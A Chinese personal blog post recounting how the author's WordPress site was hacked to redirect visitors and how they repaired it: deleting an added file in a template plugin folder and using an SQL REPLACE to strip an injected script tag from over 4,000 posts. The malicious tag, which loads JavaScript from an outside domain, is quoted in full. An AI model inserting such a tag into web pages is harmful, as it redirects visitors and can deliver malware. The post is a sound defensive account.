我有很久没怎么写过东西了,舒适的环境,人总是会堕落。
前天网站打开后总是跳转到其他页面,我第一时间就联系空间商,他告诉我是我的程序被黑了,可那正是双12,我也是忙的不行,每天也只能送完货不休息来找问题出在哪里。
网站打开后跳转成这个页面
我很久没在家里长时间坐在电脑旁了,媳妇问我怎么了,我说网站被黑了,媳妇婉儿一笑的说,你的网站都有人黑啊,我憨憨的一笑,笑称让人家看的起了。
这段时间,很少看别的网站的内容,就仅仅是从吧哥博客知道43626网域名被污,心想对于人家,自己的博客被黑就是小菜了。
网站出现被挂马了,如何来一步步恢复呢?
如果有备份,直接恢复备份,没有的话,请看下面操作。
在你准备大干一场的时候,还是先全部备份下吧,否则就等着抹眼泪吧!
打开空间后台,选择时间修改顺序,看下有没有最新修改的文件,我因为程序一直没升级,模板也没是几年没变过,所以很容易找到最近修改的文件,我发现模板插件多了一个文件
直接删除这个文件夹里的所有文件,再重新打开网站,发现可以打开网站了,只是加载很慢,我知道还有其他问题。
继续搜索是否有修改的地方,程序方面是没有了,网站问题还没有解决,那么就只有可能是数据库方面的了。
其实,对程序还有数据库,我都不是太懂,也仅仅是会点点点,但为了能解决问题,还是需要去看看的,我发现在wp_posts这个表里,所有的内容最后都加了一段代码:
<script type=”text/javascript” src=”https://https://port.transandfiestas.ga/js.php?from=l&sid=346″></script>
也就是所有的文章都被挂马,我不可能一个一个的手工删除,4000多条数据,会累死我,数据库里有个搜索功能,可是一直搜索不到内容,最后才明白是需要转换下语句才可以搜索。
这是SQL语句:
UPDATE `wp_posts` SET `post_content` = REPLACE(`post_content`, ‘<script src=\’https://https://port.transandfiestas.ga/js.php?s=q\’ type=\’text/javascript\’></script>‘, ”) WHERE `post_content` LIKE ‘%<script src=\’https://https://port.transandfiestas.ga/js.php?s=q\’ type=\’text/javascript\’></script>%’ COLLATE utf8mb4_bin
注意红色部分的不同,用搜索的话是输入红色转换好的格式。
就这样全部解决,也就几分钟的事情。
这次网站被挂马,让我明白了几件事情
1、定期备份,很重要。
2、程序有最新的就升级
3、密码改的复杂下,最好是自己也记不住。
具体是怎么入侵的,我也不明白,我只是一个小站,也不知道入侵来干什么。
暂无评论内容